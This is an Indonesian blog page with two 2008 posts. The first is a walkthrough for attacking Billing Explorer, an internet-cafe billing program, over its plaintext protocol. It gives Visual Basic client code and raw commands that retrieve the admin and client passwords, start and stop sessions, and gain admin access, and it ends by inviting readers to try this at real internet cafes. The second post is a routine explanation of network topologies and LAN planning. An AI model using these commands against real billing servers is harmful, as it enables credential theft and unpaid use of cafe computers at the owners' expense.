This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Kamis, 30 Oktober 2008

Hack Billing explorer

Memanfaatkan Kelemahan Billing Explorer, Sekedar informasi buat operator warnetSebelum masuk ke inti permasalahan, ada yang perlu anda persiapkan:
- Coba download program demo nya di www.billingexplorer.com
Server program dan client program
- Setelah berhasil mendownload ke duanya, silahkan anda install
terlebih dahulu.
- Apabila proses installasi selesai, silahkan anda coba jalankan kedua
program tersebut pada satu komputer.
- Jalankan program server terlebih dahulu kemudian program clientnya
- Secara default passwordnya akan berisi 008
- ok saya anggap anda semua udah bisa menjalankannya.

Nah apabila selesai proses diatas coba anda jalankan hanya program servernya saja. Kita akan liat kelemahan yang terjadi pada koneksinya.Nah apabila selesai proses diatas coba anda jalankan hanya program servernya saja. Kita akan liat kelemahan yang terjadi pada koneksinya.

Kalo kalian pake program packet snipper mungkin akan kelihatan, data apa saja yang dikirim ke client…….Setelah diamati beberapa menit dengan program packetsnipper ternyata setiap data yang dikirim ke client melalui winsock tidak terproteksi atau dalam kata lain hanya berupa plaintext saja…ops….ternyata….he…he…. :spiteful:

Okeh kita lanjut lagi, jika dilihat pada data yang dikirim oleh program server selalu diawali dengan ‘YYY’ dan sebaliknya apabila dikirim dari client ke server akan diawali dengan ‘XXX’ (tanpa apoustrop).

(”Mungkin hal seperti ini akan berakibat fatal, ini bisa kita jadikan contoh bahwa data yang dikirim diusahakan harus terenkripsi untuk menghindari dan meminimalisasi pencurian data2 yang berbentuk plain text.”)

Ada beberapa perintah yang dikirim dari client ke server seperti:

XXX$personal$2$HIPERSEKS$

kalo saya gak salah artikan perintah diatas, menjadi spt ini:
XXX -> Perintah dari client
$ -> sebagai seperator atau pemisah parameter
personal -> type login yang digunakan user
$ -> sebagai seperator atau pemisah parameter
2 -> No PC Client yang telah di setting
$ -> sebagai seperator atau pemisah parameter
HIPERSEKS -> Nama yang digunakan oleh user

Maka kesimpulannya kita bisa login ke program server tanpa program client bawaanya dan kita bisa ganti dengan program kecil buatan sendiri.

Coba anda buat satu project dengan:
1 form, 1 winsock control, 2 commandbutton dan 2 textbox
untuk text1 rubah properti Multiline= True dengan Scrollbars=Both

Private Sub Command1_Click ()
SOCK.Close
‘// Masukan IPAddress Servernya dengan Port 1500 (default port)
SOCK.Connect “192.168.0.1″, “1500″
End Sub

Private Sub Command2_Click ()
If SOCK.State = sckConnected Then SOCK.SendData Text2.Text
End Sub

Private Sub SOCK_DataArrival( ByVal bytesTotal As Long )
Dim Data As String
SOCK.GetData Data
Text1.SelText = Data & vbCrLf & String (50, “-”) & vbCrLf
End Sub

setelah selesai koding diatas coba anda jalankan, lakukan koneksi keserver dengan menekan tombol command1. Apabila berhasil koneksi ke server coba anda tuliskan beberapa perintah dibawah ini pada textbox2 dan diakhiri dengan menekan tombol Command2.

Perintah:
XXX$passY$2$

perintah diatas digunakan untuk melihat password client dan password server pada PC Client No 2 (dua). hasil data yang dikirim dari server ke client dengan menyertakan perintah diatas akan terlihat seperti ini:

YYY$passY$008$Warnet Integral$JL. Prof.Bunyamin 667 Purwokerto 0281-642492$Email info_008@yahoo.com - http://www.billingexplorer.com$111

kalo dilihat pada kata ‘008′ dan ‘111′, ini dapat diartikan sebagai password Administrator dan Password PC Client.

kita bisa klik tombol admin pada program clientnya, dan masukan passwordnya.
anda bisa mencoba beberapa perintah dibawah ini:
1. XXX$personal$2$HIPERSEKS$
(Login pada PC no 2 dengan nama user HIPERSEKS)
2. XXX$stop$2$HIPERSEKS
(untuk logout dari billing)
3. XXX$con$2$HIPERSEKS
4. XXX$infod2$2$
5. XXX$ablock$2$
6. XXX$admin$2$Admin
7. XXX$tutup$2$$

Anda bisa cari lagi perintah2 yg lain dengan menggunakan packet snipper seperti ‘EtherDetect Packet Sniffer’.

Selain itu ada beberapa kelemahan lain yang terdapat pada program ini, seperti tidak diproteksinya file executable dengan program-program compress exe, spt UPX,PE-COMPAT ataupun yg lain. ini sangat memudahkan untuk di CRack.

Sekedar info, program yang saya coba adalah Billing-Explorer Ver 4.40 Grand R-14a. yang di compile dengan visual basic v 5.0

Jadi kalo jalan-jalan ke warnet dan kebetulan billing nya menggunakan program ini, hmmm.m.m..mmmm…sekalian bisa dicoba…nih….

Selasa, 14 Oktober 2008

Jaringan

Topologi Bus
Karakteristik topologi ini adalah sebagai Berikut :

Disebut juga Daisy Chain.
• Paling banyak dipakai karena sederhana dalam instalasi.
• Pada topologi bus, terdapat satu jalur umum yang berbentuk suatu garis lurus. Yang mana kemudian masing-masing node dihubungkan kedalam jalur garis tersebut.
• Transmisi dari suatu workstation dapat menyebar dan menjalar ke workstation lainnya, ini disebabkan setiap workstation menggunakan media transmisi yang sama.
• Dapat terjadi collision (dua paket data tercampur), karena sinyal mengalir dalam dua arah.
• Problem terbesar : jika salah satu segmen kabel putus, maka seluruh jaringan akan terhenti.
• Meskipun ada percabangan media transmisi, tetapi tidak membentuk jalur tertutup (closed loop).
• Berupa bentangan satu kabel yang kedua ujungnya ditutup oleh terminator dan terdapat node-node sepanjang kabel.
• Instalasi mudah dilakukan.
Topologi Star

Karakteristik topologi ini sebagai berikut :

• Medium transmisi yang digunakan dalam tipe topologi ini, membentuk jalur tertutup (closed loop), dan setiap workstation mempunyai kabel tersendiri untuk langsung berhubungan dengan file server, sehingga seluruh sistem tidak akan gagal bila ada salah satu kabel pada workstation yang terganggu.
• Mudah dikembangkan, karena tiap node hanya memiliki kabel yang langsung terhubung kecentral node.
• Dapat digunakan kabel yang "lower grade", karena hanya menghandle satu lalu lintas data, biasanya digunakan kabel UTP.Node-node tersambung langsung ke suatu node pusat (biasa berupa hub), sehingga mudah dikembangkan.
• Keuntungannya dari topologi star adalah apabila satu kabel node terputus, node lainnya tidak terganggu


Topologi Ring

Karakteristik topologi ini sebagai berikut :

• Dalam topologi ring, setiap node dihubungkan dengan node lain, sehingga membentuk lingkaran.
• Karena sistem transmisinya menggunakan kabel yang saling menghubungkan beberapa workstation dengan file server dalam bentuk lingkaran tertutup, maka tipe ini memiliki kelemahan, yaitu apabila pada salah satu hubungan ada yang putus, maka keseluruhan hubungan terputus.

Merencanakan LAN

Sekarang kita akan membahas bagaimana merencanakan suatu LAN yang baik. Tujuan utamanya untuk merancang LAN yang memenuhi kebutuhan pengguna saat ini dan dapat dikembangkan di masa yang akan datang sejalan dengan peningkatan kebutuhan jaringan yang lebih besar. Desain sebuah LAN meliputi perencanaan secara fisik dan logic . Perencanaan fisik meliputi media yang digunakan bersama dan infrastruktur LAN yakni pengkabelan sebagai jalur fisik komunikasi setiap devais jaringan. Infrastruktur yang dirancang dengan baik cukup fleksibel untuk memenuhi kebutuhan sekarang dan masa datang.
Metode perencanaan LAN meliputi :
• Seorang administrator network yang bertanggung jawab terhadap jaringan.
• Pengalokasian IP address dengan subnetting.
• Peta letak komputer dari LAN dan topologi yang hendak kita gunakan.
• Persiapan fisik yang meliputi pengkabelan dan peralatan lainnya.
Di antara hal-hal yang perlu diperhatikan dalam perancangan LAN adalah lokasi fisik itu sendiri. Peta atau cetak biru bangunan-bangunan yang akan dihubungkan serta informasi jalur kabel (conduit) yang ada dan menghubungkan bangunan-bangunan tersebut sangat diperlukan. Jika peta seperti ini tidak ada maka perlu digambarkan peta dengan cara menurut kabel-kabel yang ada. Secara umum dapat diasumsikan bahwa pengkabelan yang menghubungkan bangunan-bangunan atau yang melewati tempat terbuka harus terdapat di dalam conduit. Seorang manajer jaringan harus menghubungi manajer bangunan untuk mengetahui aturan-aturan pengkabelan ini sebab manajer bangunan yang mengetahui dan bertanggung jawab atas bangunan tersebut. Pada setiap lokasi (yang dapat terdiri dari beberapa bangunan) harus ditunjuk seorang manajer jaringan. Manajer jaringan harus mengetahui semua konfigurasi jaringan dan pengkabelan pada lokasi yang menjadi tanggung jawabnya. Pada awalnya tugas ini hanya memakan waktu sedikit. Namun sejalan dengan perkembangan jaringan menjadi lebih kompleks, tugas ini berubah menjadi tugas yang berat. Jadi sebaiknya dipilih orang yang betul-betul berminat dan mau terlibat dalam perkembangan jaringan.